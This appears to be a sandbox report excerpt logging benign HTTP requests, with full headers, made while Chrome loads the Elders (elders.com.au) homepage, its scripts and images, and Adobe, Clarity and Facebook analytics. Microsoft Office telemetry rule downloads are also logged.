      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/clientlibs/granite/jquery.lc-f9e8e8c279baf6a1a278042afe4f395a-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /tag/mupsjrmw7f HTTP/1.1Host: www.clarity.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/clientlibs/granite/utils.lc-899004cc02c33efc1f6694b1aee587fd-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /id?d_visid_ver=5.5.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_orgid=812E14B761A133470A495CCA%40AdobeOrg&d_nsid=0&ts=1730870990712 HTTP/1.1Host: dpm.demdex.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-platform: "Windows"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Content-Type: application/x-www-form-urlencodedAccept: */*Origin: https://elders.com.auSec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/find-expert.png HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CvVersion%7C5.5.0
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/images/homepage-banners/rpu_q2_2024_landingpagebanner.jpg HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CvVersion%7C5.5.0
      Source: global trafficHTTP traffic detected: GET /rules/rule120663v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120660v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120662v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120661v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120664v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/clientlibs/granite/jquery/granite.lc-011c0fc0d0cf131bdff879743a353002-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/foundation/clientlibs/jquery.lc-dd9b395c741ce2784096e26619e14910-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-react.lc-2d7df618eb528a2ce626641aaccea776-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/core/wcm/components/commons/site/clientlibs/container.lc-0a6aff292f5cc42142779cde92054524-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage
      Source: global trafficHTTP traffic detected: GET /dest5.html?d_nsid=0 HTTP/1.1Host: eldersrural.demdex.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: cross-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=06707212550236574584203622074167040076
      Source: global trafficHTTP traffic detected: GET /s/0.7.53/clarity.js HTTP/1.1Host: www.clarity.msConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CLID=489e5e226c6c49998a92be7444faa5c9.20241106.20251106
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-base.lc-e592021eafd59de123415ab937a09f08-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage
      Source: global trafficHTTP traffic detected: GET /libs/granite/csrf/token.json HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage
      Source: global trafficHTTP traffic detected: GET /rules/rule120667v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120669v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120668v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120666v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/el/clientlibs/clientlib-site/resources/images/svg/icon-chevron-left.svg HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/clientlibs/granite/utils.lc-899004cc02c33efc1f6694b1aee587fd-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/clientlibs/granite/jquery.lc-f9e8e8c279baf6a1a278042afe4f395a-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/images/homepage-banners/modern_home.jpg HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/teamwork-icon.png HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage
      Source: global trafficHTTP traffic detected: GET /etc.clientlibs/clientlibs/granite/jquery/granite.lc-011c0fc0d0cf131bdff879743a353002-lc.min.js HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/icons---logos/icons/icon_farm_supplies.png HTTP/1.1Host: elders.com.auConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage
      Source: global trafficHTTP traffic detected: GET /rules/rule120665v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /id?d_visid_ver=5.5.0&d_fieldgroup=MC&d_rtbd=json&d_ver=2&d_orgid=812E14B761A133470A495CCA%40AdobeOrg&d_nsid=0&ts=1730870990712 HTTP/1.1Host: dpm.demdex.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: demdex=06707212550236574584203622074167040076
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/images/livestocknow/close_up_ram_head_horns.png HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage
      Source: global trafficHTTP traffic detected: GET /signals/config/1013340413305983?v=2.9.176&r=stable&domain=elders.com.au&hme=872f04a0547459b3285cb03b0d7a47bfde40628f4b386809918a621e2688602f&ex_m=70%2C121%2C107%2C111%2C61%2C4%2C100%2C69%2C16%2C97%2C89%2C51%2C54%2C172%2C175%2C187%2C183%2C184%2C186%2C29%2C101%2C53%2C77%2C185%2C167%2C170%2C180%2C181%2C188%2C131%2C41%2C189%2C190%2C34%2C143%2C15%2C50%2C195%2C194%2C133%2C18%2C40%2C1%2C43%2C65%2C66%2C67%2C71%2C93%2C17%2C14%2C96%2C92%2C91%2C108%2C52%2C110%2C39%2C109%2C30%2C94%2C26%2C168%2C171%2C140%2C86%2C56%2C84%2C33%2C73%2C0%2C95%2C32%2C28%2C82%2C83%2C88%2C47%2C46%2C87%2C37%2C11%2C12%2C13%2C6%2C7%2C25%2C22%2C23%2C57%2C62%2C64%2C75%2C102%2C27%2C76%2C9%2C8%2C80%2C48%2C21%2C104%2C103%2C105%2C98%2C10%2C20%2C3%2C38%2C74%2C19%2C5%2C90%2C81%2C44%2C35%2C85%2C2%2C36%2C63%2C42%2C106%2C45%2C79%2C68%2C112%2C60%2C59%2C31%2C99%2C58%2C55%2C49%2C78%2C72%2C24%2C113 HTTP/1.1Host: connect.facebook.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/images/homepage-banners/staff_background_wheat.jpg HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage
      Source: global trafficHTTP traffic detected: GET /react-dom@18.3.1/umd/react-dom.development.js HTTP/1.1Host: unpkg.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /en_US/fbevents.js HTTP/1.1Host: connect.facebook.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
      Source: global trafficHTTP traffic detected: GET /tag/mupsjrmw7f HTTP/1.1Host: www.clarity.msConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CLID=489e5e226c6c49998a92be7444faa5c9.20241106.20251106
      Source: global trafficHTTP traffic detected: GET /s/0.7.53/clarity.js HTTP/1.1Host: www.clarity.msConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: CLID=489e5e226c6c49998a92be7444faa5c9.20241106.20251106
      Source: global trafficHTTP traffic detected: GET /content/dam/eld/images/homepage-banners/two_staff_members_with_client_by_ute.jpg HTTP/1.1Host: elders.com.auConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://elders.com.au/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Cookie: AMCVS_812E14B761A133470A495CCA%40AdobeOrg=1; AMCV_812E14B761A133470A495CCA%40AdobeOrg=179643557%7CMCIDTS%7C20034%7CMCMID%7C01878392218234141113567963242819045089%7CMCAAMLH-1731475791%7C6%7CMCAAMB-1731475791%7C6G1ynYcLPuiQxYZrsz_pkqfLG9yMXBpb2zX5dvJdYQJzPXImdj0y%7CMCOPTOUT-1730878191s%7CNONE%7CvVersion%7C5.5.0; s_gpv=elders:homepage
      Source: global trafficHTTP traffic detected: GET /rules/rule120672v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120673v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
      Source: global trafficHTTP traffic detected: GET /rules/rule120671v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
